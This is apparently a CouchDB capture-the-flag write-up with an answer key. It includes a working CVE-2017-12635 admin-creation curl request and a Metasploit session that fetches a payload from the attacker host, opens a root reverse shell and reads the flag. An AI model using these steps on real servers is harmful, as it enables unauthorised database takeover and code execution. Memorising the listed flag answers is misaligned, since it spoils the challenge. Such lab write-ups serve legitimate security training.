# Hack Databases! - 1 CouchDB

**Açıklama**:

CyberPath Bank sizi sızma testi sağlayıcısı olarak işe aldı. Bu hafta databaseleri test edeceksiniz. Size kablolu alt ağa erişim için bir attacker makine sağlandı. 

Apache CouchDB, Erlang'da uygulanan açık kaynaklı, belge odaklı bir NoSQL veritabanıdır. CouchDB, verilerini depolamak, aktarmak ve işlemek için birden çok format ve protokol kullanır. Verileri depolamak için JSON'u, MapReduce kullanarak sorgu dili olarak JavaScript'i ve bir API için HTTP'yi kullanır.

**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Zaafiyetli servisi ve CVE ID'sini bulmak.
- Database panelini ele geçirip database'leri incelemek.
- Server'ı ele geçirmek.

**Flags**:
- Serverda hangi port açıktır?
    - answer: **5984**
- Serverda çalışan uygulamanın ismi nedir?
    - answer: **couchdb**
- Serverda çalışan uygulamanın versiyonu nedir?
    - answer: **2.1.0**
- Uygulamaya ait CVE?
    - answer: **CVE-2017-12635**
- Sistemde kaç database vardır?
    - answer: **9**
- 2020 ile alakalı database ismi nedir?
    - answer: **records_2020**
- flag.txt?
    - answer: **CyberPath{G2Grm6YkcpYrXWAd}**


## **Solution**:

- **Enum**:

```bash
attacker@cyberpath:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 733  bytes 44534 (44.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 478  bytes 5620605 (5.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 620  bytes 5628728 (5.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 620  bytes 5628728 (5.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ sudo nmap -sC -sV -O --script vuln 10.0.0.140 -p-
[sudo] password for attacker: 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-27 08:30 UTC
Nmap scan report for db_1_couchdb_1.db_1_internal_network (10.0.0.140)
Host is up (0.00018s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE  VERSION
5984/tcp open  couchdb?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   GenericLines, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Server: MochiWeb/1.0 (Any of you quaids got a smint?)
|     Date: Mon, 27 Dec 2021 08:30:18 GMT
|     Content-Length: 0
|     Connection: close
|   GetRequest: 
|     HTTP/1.0 200 OK
|     X-CouchDB-Body-Time: 0
|     X-Couch-Request-ID: e1a7ac7744
|     Server: CouchDB/2.1.0 (Erlang OTP/17)
|     Date: Mon, 27 Dec 2021 08:30:18 GMT
|     Content-Type: application/json
|     Content-Length: 116
|     Connection: close
|     Cache-Control: must-revalidate
|     {"couchdb":"Welcome","version":"2.1.0","features":["scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
|   HTTPOptions: 
|     HTTP/1.0 500 Internal Server Error
|     X-CouchDB-Body-Time: 0
|     X-Couch-Stack-Hash: 4250487516
|     X-Couch-Request-ID: 040151acd4
|     Server: CouchDB/2.1.0 (Erlang OTP/17)
|     Date: Mon, 27 Dec 2021 08:30:18 GMT
|     Content-Type: application/json
|     Content-Length: 61
|     Connection: close
|     Cache-Control: must-revalidate
|     {"error":"unknown_error","reason":"badarg","ref":4250487516}
|   Help, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Server: MochiWeb/1.0 (Any of you quaids got a smint?)
|     Date: Mon, 27 Dec 2021 08:30:33 GMT
|     Content-Length: 0
|_    Connection: close
5986/tcp open  http     CouchDB httpd 2.1.0 (Erlang OTP/17)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: CouchDB/2.1.0 (Erlang OTP/17)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5984-TCP:V=7.80%I=7%D=12/27%Time=61C9799A%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,9E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nServer:\x20MochiW
SF:eb/1\.0\x20\(Any\x20of\x20you\x20quaids\x20got\x20a\x20smint\?\)\r\nDat
SF:e:\x20Mon,\x2027\x20Dec\x202021\x2008:30:18\x20GMT\r\nContent-Length:\x
SF:200\r\nConnection:\x20close\r\n\r\n")%r(GetRequest,173,"HTTP/1\.0\x2020
SF:0\x20OK\r\nX-CouchDB-Body-Time:\x200\r\nX-Couch-Request-ID:\x20e1a7ac77
SF:44\r\nServer:\x20CouchDB/2\.1\.0\x20\(Erlang\x20OTP/17\)\r\nDate:\x20Mo
SF:n,\x2027\x20Dec\x202021\x2008:30:18\x20GMT\r\nContent-Type:\x20applicat
SF:ion/json\r\nContent-Length:\x20116\r\nConnection:\x20close\r\nCache-Con
SF:trol:\x20must-revalidate\r\n\r\n{\"couchdb\":\"Welcome\",\"version\":\"
SF:2\.1\.0\",\"features\":\[\"scheduler\"\],\"vendor\":{\"name\":\"The\x20
SF:Apache\x20Software\x20Foundation\"}}\n")%r(HTTPOptions,16E,"HTTP/1\.0\x
SF:20500\x20Internal\x20Server\x20Error\r\nX-CouchDB-Body-Time:\x200\r\nX-
SF:Couch-Stack-Hash:\x204250487516\r\nX-Couch-Request-ID:\x20040151acd4\r\
SF:nServer:\x20CouchDB/2\.1\.0\x20\(Erlang\x20OTP/17\)\r\nDate:\x20Mon,\x2
SF:027\x20Dec\x202021\x2008:30:18\x20GMT\r\nContent-Type:\x20application/j
SF:son\r\nContent-Length:\x2061\r\nConnection:\x20close\r\nCache-Control:\
SF:x20must-revalidate\r\n\r\n{\"error\":\"unknown_error\",\"reason\":\"bad
SF:arg\",\"ref\":4250487516}\n")%r(RTSPRequest,9E,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nServer:\x20MochiWeb/1\.0\x20\(Any\x20of\x20you\x20quaids
SF:\x20got\x20a\x20smint\?\)\r\nDate:\x20Mon,\x2027\x20Dec\x202021\x2008:3
SF:0:18\x20GMT\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n")%r
SF:(Help,9E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nServer:\x20MochiWeb/1\.
SF:0\x20\(Any\x20of\x20you\x20quaids\x20got\x20a\x20smint\?\)\r\nDate:\x20
SF:Mon,\x2027\x20Dec\x202021\x2008:30:33\x20GMT\r\nContent-Length:\x200\r\
SF:nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,9E,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nServer:\x20MochiWeb/1\.0\x20\(Any\x20of\x20you\x20qu
SF:aids\x20got\x20a\x20smint\?\)\r\nDate:\x20Mon,\x2027\x20Dec\x202021\x20
SF:08:30:33\x20GMT\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n
SF:")%r(TerminalServerCookie,9E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSer
SF:ver:\x20MochiWeb/1\.0\x20\(Any\x20of\x20you\x20quaids\x20got\x20a\x20sm
SF:int\?\)\r\nDate:\x20Mon,\x2027\x20Dec\x202021\x2008:30:33\x20GMT\r\nCon
SF:tent-Length:\x200\r\nConnection:\x20close\r\n\r\n");
MAC Address: 02:42:0A:00:00:8C (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/27%OT=5984%CT=1%CU=36330%PV=Y%DS=1%DC=D%G=Y%M=02420
OS:A%TM=61C97B6F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%I
OS:I=I%TS=A)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW
OS:0%O5=M5B4ST11NW0%O6=M5B4ST11)WIN(W1=1C48%W2=1C48%W3=1C48%W4=1C48%W5=1C48
OS:%W6=1C48)ECN(R=Y%DF=Y%T=40%W=1C84%O=M5B4NNSNW0%CC=Y%Q=)T1(R=Y%DF=Y%T=40%
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=40%CD=S)

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 486.23 seconds
```

- **Explotation**:

Lets try access with firefox. The home page will return us the version. If we open /_utils/ page there is a login panel. We can't login with random credentials. 

![1](1.PNG)
![2](2.PNG)
![3](3.PNG)

If we search couchdb 2.1.0 we can find CVE-2017-12635. With curl request we can create admin account.

```bash
attacker@cyberpath:~$ curl -X PUT 'http://10.0.0.140:5984/_users/org.couchdb.user:hacked' --data-binary '{ 
  "type": "user",
  "name": "hacked",
  "roles": ["_admin"],
  "roles": [],
  "password": "password"
}'
{"ok":true,"id":"org.couchdb.user:hacked","rev":"1-235d0b89711f30f9b12ad15388f0cc8e"}
```
We can login with credentials and see databases.

![4](4.PNG)

- **Metasploit**

With Metasploit we can get reverse shell from couchdb server.

```bash
attacker@cyberpath:~$ msfconsole 
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[!] The following modules could not be loaded!..|
[!] 	/opt/metasploit-framework/embedded/framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/attacker/.msf4/logs/framework.log for details.
                                                  

*Neutrino_Cannon*PrettyBeefy*PostalTime*binbash*deadastronauts*EvilBunnyWrote*L1T*Mail.ru*() { :;}; echo vulnerable*
*Team sorceror*ADACTF*BisonSquad*socialdistancing*LeukeTeamNaam*OWASP Moncton*Alegori*exit*Vampire Bunnies*APT593*
*QuePasaZombiesAndFriends*NetSecBG*coincoin*ShroomZ*Slow Coders*Scavenger Security*Bruh*NoTeamName*Terminal Cult*
*edspiner*BFG*MagentaHats*0x01DA*Kaczuszki*AlphaPwners*FILAHA*Raffaela*HackSurYvette*outout*HackSouth*Corax*yeeb0iz*
*SKUA*Cyber COBRA*flaghunters*0xCD*AI Generated*CSEC*p3nnm3d*IFS*CTF_Circle*InnotecLabs*baadf00d*BitSwitchers*0xnoobs*
*ItPwns - Intergalactic Team of PWNers*PCCsquared*fr334aks*runCMD*0x194*Kapital Krakens*ReadyPlayer1337*Team 443*
*H4CKSN0W*InfOUsec*CTF Community*DCZia*NiceWay*0xBlueSky*ME3*Tipi'Hack*Porg Pwn Platoon*Hackerty*hackstreetboys*
*ideaengine007*eggcellent*H4x*cw167*localhorst*Original Cyan Lonkero*Sad_Pandas*FalseFlag*OurHeartBleedsOrange*SBWASP*
*Cult of the Dead Turkey*doesthismatter*crayontheft*Cyber Mausoleum*scripterz*VetSec*norbot*Delta Squad Zero*Mukesh*
*x00-x00*BlackCat*ARESx*cxp*vaporsec*purplehax*RedTeam@MTU*UsalamaTeam*vitamink*RISC*forkbomb444*hownowbrowncow*
*etherknot*cheesebaguette*downgrade*FR!3ND5*badfirmware*Cut3Dr4g0n*dc615*nora*Polaris One*team*hail hydra*Takoyaki*
*Sudo Society*incognito-flash*TheScientists*Tea Party*Reapers of Pwnage*OldBoys*M0ul3Fr1t1B13r3*bearswithsaws*DC540*
*iMosuke*Infosec_zitro*CrackTheFlag*TheConquerors*Asur*4fun*Rogue-CTF*Cyber*TMHC*The_Pirhacks*btwIuseArch*MadDawgs*
*HInc*The Pighty Mangolins*CCSF_RamSec*x4n0n*x0rc3r3rs*emehacr*Ph4n70m_R34p3r*humziq*Preeminence*UMGC*ByteBrigade*
*TeamFastMark*Towson-Cyberkatz*meow*xrzhev*PA Hackers*Kuolema*Nakateam*L0g!c B0mb*NOVA-InfoSec*teamstyle*Panic*
*B0NG0R3*                                                                                    *Les Cadets Rouges*buf*
*Les Tontons Fl4gueurs*                                                                      *404 : Flag Not Found*
*' UNION SELECT 'password*      _________                __                                  *OCD247*Sparkle Pony* 
*burner_herz0g*                 \_   ___ \_____  _______/  |_ __ _________   ____            *Kill$hot*ConEmu*
*here_there_be_trolls*          /    \  \/\__  \ \____ \   __\  |  \_  __ \_/ __ \           *;echo"hacked"*
*r4t5_*6rung4nd4*NYUSEC*        \     \____/ __ \|  |_> >  | |  |  /|  | \/\  ___/           *karamel4e*
*IkastenIO*TWC*balkansec*        \______  (____  /   __/|__| |____/ |__|    \___  >          *cybersecurity.li*
*TofuEelRoll*Trash Pandas*              \/     \/|__|                           \/           *OneManArmy*cyb3r_w1z4rd5*
*Astra*Got Schwartz?*tmux*                  ___________.__                                   *AreYouStuck*Mr.Robot.0*
*\nls*Juicy white peach*                    \__    ___/|  |__   ____                         *EPITA Rennes*
*HackerKnights*                               |    |   |  |  \_/ __ \                        *guildOfGengar*Titans*
*Pentest Rangers*                             |    |   |   Y  \  ___/                        *The Libbyrators*
*placeholder name*bitup*                      |____|   |___|  /\___  >                       *JeffTadashi*Mikeal*
*UCASers*onotch*                                            \/     \/                        *ky_dong_day_song*
*NeNiNuMmOk*                              ___________.__                                     *JustForFun!*
*Maux de tête*LalaNG*                     \_   _____/|  | _____     ____                     *g3tsh3Lls0on*
*crr0tz*z3r0p0rn*clueless*                 |    __)  |  | \__  \   / ___\                    *Phở Đặc Biệt*Paradox*
*HackWara*                                 |     \   |  |__/ __ \_/ /_/  >                   *KaRIPux*inf0sec*
*Kugelschreibertester*                     \___  /   |____(____  /\___  /                    *bluehens*Antoine77*
*icemasters*                                   \/              \//_____/                     *genxy*TRADE_NAMES*
*Spartan's Ravens*                       _______________   _______________                   *BadByte*fontwang_tw*
*g0ldd1gg3rs*pappo*                     \_____  \   _  \  \_____  \   _  \                   *ghoti*
*Les CRACKS*c0dingRabbits*               /  ____/  /_\  \  /  ____/  /_\  \                  *LinuxRiders*   
*2Cr4Sh*RecycleBin*                     /       \  \_/   \/       \  \_/   \                 *Jalan Durian*
*ExploitStudio*                         \_______ \_____  /\_______ \_____  /                 *WPICSC*logaritm*
*Car RamRod*0x41414141*                         \/     \/         \/     \/                  *Orv1ll3*team-fm4dd*
*Björkson*FlyingCircus*                                                                      *PwnHub*H4X0R*Yanee*
*Securifera*hot cocoa*                                                                       *Et3rnal*PelarianCP*
*n00bytes*DNC&G*guildzero*dorko*tv*42*{EHF}*CarpeDien*Flamin-Go*BarryWhite*XUcyber*FernetInjection*DCcurity*
*Mars Explorer*ozen_cfw*Fat Boys*Simpatico*nzdjb*Isec-U.O*The Pomorians*T35H*H@wk33*JetJ*OrangeStar*Team Corgi*
*D0g3*0itch*OffRes*LegionOfRinf*UniWA*wgucoo*Pr0ph3t*L0ner*_n00bz*OSINT Punchers*Tinfoil Hats*Hava*Team Neu*
*Cyb3rDoctor*Techlock Inc*kinakomochi*DubbelDopper*bubbasnmp*w*Gh0st$*tyl3rsec*LUCKY_CLOVERS*ev4d3rx10-team*ir4n6*
*PEQUI_ctf*HKLBGD*L3o*5 bits short of a byte*UCM*ByteForc3*Death_Geass*Stryk3r*WooT*Raise The Black*CTErr0r*
*Individual*mikejam*Flag Predator*klandes*_no_Skids*SQ.*CyberOWL*Ironhearts*Kizzle*gauti*
*San Antonio College Cyber Rangers*sam.ninja*Akerbeltz*cheeseroyale*Ephyra*sard city*OrderingChaos*Pickle_Ricks*
*Hex2Text*defiant*hefter*Flaggermeister*Oxford Brookes University*OD1E*noob_noob*Ferris Wheel*Ficus*ONO*jameless*
*Log1c_b0mb*dr4k0t4*0th3rs*dcua*cccchhhh6819*Manzara's Magpies*pwn4lyfe*Droogy*Shrubhound Gang*ssociety*HackJWU*
*asdfghjkl*n00bi3*i-cube warriors*WhateverThrone*Salvat0re*Chadsec*0x1337deadbeef*StarchThingIDK*Tieto_alaviiva_turva*
*InspiV*RPCA Cyber Club*kurage0verfl0w*lammm*pelicans_for_freedom*switchteam*tim*departedcomputerchairs*cool_runnings*
*chads*SecureShell*EetIetsHekken*CyberSquad*P&K*Trident*RedSeer*SOMA*EVM*BUckys_Angels*OrangeJuice*DemDirtyUserz*
*OpenToAll*Born2Hack*Bigglesworth*NIS*10Monkeys1Keyboard*TNGCrew*Cla55N0tF0und*exploits33kr*root_rulzz*InfosecIITG*
*superusers*H@rdT0R3m3b3r*operators*NULL*stuxCTF*mHackresciallo*Eclipse*Gingabeast*Hamad*Immortals*arasan*MouseTrap*
*damn_sadboi*tadaaa*null2root*HowestCSP*fezfezf*LordVader*Fl@g_Hunt3rs*bluenet*P@Ge2mE*



       =[ metasploit v6.1.3-dev-                          ]
+ -- --=[ 2161 exploits - 1146 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging 
with set HttpTrace true

msf6 > use exploit/linux/http/apache_couchdb_cmd_exec
[*] Using configured payload linux/x64/shell_reverse_tcp
msf6 exploit(linux/http/apache_couchdb_cmd_exec) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Apache CouchDB version 1.x
   2   Apache CouchDB version 2.x


msf6 exploit(linux/http/apache_couchdb_cmd_exec) > set target 2
target => 2
msf6 exploit(linux/http/apache_couchdb_cmd_exec) > show options 

Module options (exploit/linux/http/apache_couchdb_cmd_exec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password to login with
   HttpUsername                   no        The username to login as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         5984             yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
                                             to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit to download and execute. (default is random)
   VHOST                          no        HTTP server virtual host


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Apache CouchDB version 2.x


msf6 exploit(linux/http/apache_couchdb_cmd_exec) > set rhosts 10.0.0.140
rhosts => 10.0.0.140
msf6 exploit(linux/http/apache_couchdb_cmd_exec) > set lhost 10.0.0.2
lhost => 10.0.0.2
msf6 exploit(linux/http/apache_couchdb_cmd_exec) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] Generating curl command stager
[*] Using URL: http://0.0.0.0:8080/LBQJG3s
[*] Local IP: http://10.0.0.2:8080/LBQJG3s
[*] 10.0.0.140:5984 - The 1 time to exploit
[*] Client 10.0.0.140 (curl/7.38.0) requested /LBQJG3s
[*] Sending payload to 10.0.0.140 (curl/7.38.0)
[+] Deleted /tmp/rincxbio
[+] Deleted /tmp/gwyhquvyhlpwyde
[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.140:55838) at 2021-12-27 08:48:10 +0000

whoami
root

pwd
/opt/couchdb

ls
LICENSE
bin
data
erts-6.2
etc
lib
releases
share
var

cd /
ls
bin
boot
dev
docker-entrypoint.sh
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

cat /flag.txt
CyberPath{flag}
```
